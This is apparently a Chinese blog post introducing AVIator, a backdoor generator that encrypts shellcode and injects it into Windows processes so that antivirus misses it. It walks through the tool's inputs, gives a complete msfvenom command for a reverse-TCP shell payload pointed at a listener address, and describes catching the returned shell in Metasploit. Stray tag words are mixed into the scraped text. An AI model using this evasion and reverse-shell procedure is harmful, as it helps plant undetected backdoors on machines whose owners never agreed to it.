AVIator -- Bypass AV tool

前提概要

項目地址:https://github.com/Ch0pin/AVIatorgit

AV:全名爲AntiVirus,意指爲防病毒軟件github

AVIator是一個後門生成器實用程序,它使用加密和注入技術來繞過AV檢測。進一步來講:shell

  • 它使用AES加密來加密給定的shellcode
  • 生成包含加密有效負載的可執行文件
  • 使用各類注入技術將shellcode解密並注入目標系統
  1. 便攜式可執行注入,包括將惡意代碼直接寫入進程(沒有磁盤上的文件),而後使用其餘代碼或經過建立遠程線程調用執行。注入代碼的位移引入了從新映射內存引用的功能的附加要求。這種方法的變化,例如反射DLL注入(將自映射DLL寫入進程)和內存模塊(寫入進程時映射DLL)克服了地址重定位問題。windows

  2. 線程執行劫持涉及將惡意代碼或DLL的路徑注入進程的線程。與Process Hollowing相似,必須首先暫停該線程。tcp

 工具界面:工具

注入功能:加密

 

利用過程

工具編譯是由三部分組成spa

  1. 包含用於加密shellcode的加密密鑰的文本
  2. 包含用於AES加密的IV的文本
  3. 包含shellcode的文本

其中shellcode部分是利用csharp組成的字節碼線程

利用msf生成payload:code

msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=4444 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

將生成的字節碼copy放到工具當中

而後按照以下步驟生成

隨後在MSF中監聽

其中RC4PASSWORD的值是以前msfvenom中設置的密碼

直接運行,並在msf接受反彈回來的shell

當explorer下的cmd.exe進程結束的時候,explorer父進程也將終結

相關文章
相關標籤/搜索